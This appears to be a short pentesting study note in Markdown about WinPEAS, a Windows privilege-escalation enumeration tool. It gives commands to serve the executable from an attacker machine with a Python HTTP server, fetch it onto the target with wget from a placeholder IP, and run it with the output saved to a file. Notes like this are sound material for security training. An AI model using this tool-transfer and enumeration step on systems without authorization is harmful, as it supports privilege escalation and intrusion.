20 lines
808 B
Markdown
20 lines
808 B
Markdown
|
|
||
|
## Top Commands
|
||
|
|
||
|
WinPEAS
|
||
|
```shell-session
|
||
|
#Linux Machine
|
||
|
Download the WinPEAS executable
|
||
|
python3 -m http.server PORT ---> Host a server to transfer the file
|
||
|
|
||
|
#Windows Machine
|
||
|
wget http://IP/WinPEAS.exe
|
||
|
./winpeas.exe > outputfile.txt
|
||
|
```
|
||
|
|
||
|
- https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS
|
||
|
|
||
|
|
||
|
## What is WinPEAS
|
||
|
|
||
|
WinPEAS is a script developed to enumerate the target system to uncover privilege escalation paths. You can find more information about winPEAS and download either the precompiled executable or a .bat script. WinPEAS will run commands similar to the ones listed in the previous task and print their output. The output from winPEAS can be lengthy and sometimes difficult to read. This is why it would be good practice to always redirect the output to a file.
|